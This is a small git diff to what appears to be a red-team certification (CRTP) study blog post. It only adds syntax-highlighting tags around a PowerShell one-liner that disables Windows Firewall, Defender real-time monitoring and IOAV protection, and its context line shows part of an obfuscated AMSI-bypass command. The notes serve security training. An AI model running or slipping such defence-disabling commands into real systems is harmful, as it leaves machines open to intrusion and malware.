--- a/_posts/2022-12-09-crtp.md
+++ b/_posts/2022-12-09-crtp.md
@@ -29,8 +29,12 @@ S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-
 </div>
 
 Disable Multiple Things:
+
 <div class="box">
+{% highlight powershell %}
 Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;Set-MpPreference -DisableIOAVProtection $true;Set-MpPreference -DisableRealtimeMonitoring $true
+{% endhighlight %}
 </div>
+
 
 
